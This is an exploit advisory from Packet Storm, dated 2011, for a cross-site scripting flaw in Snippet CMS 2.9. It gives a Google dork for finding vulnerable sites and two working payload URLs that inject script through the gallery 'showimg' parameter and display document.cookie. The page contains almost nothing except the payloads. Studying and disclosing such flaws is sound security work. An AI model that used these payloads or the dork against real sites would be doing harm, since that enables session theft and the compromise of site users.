Snippet CMS version 2.9 suffers from a cross site scripting vulnerability.
ce28103ed4c015dcfa61b7684505164a0f275baf87d3f73ee702361d91a0f0af
Exploit Title: Snippet CMS v2.9 XSS Vulnerability
Google Dork: "Powered by Snippet CMS"
Date: 23.09.2011
Author: CoBRa_21
Version: 2.9
Tested on: Unix Server
-------------------------------------------------------------------------------------------------------
Exploits
https://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(document.cookie)</script>
https://localhost/path/?page=gallery&showgal=CoBRa_21&showimg="><script>alert(/CoBRa_21/)</script>
-------------------------------------------------------------------------------------------------------
Thanks e-banka.org & cyber-warrior.org
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed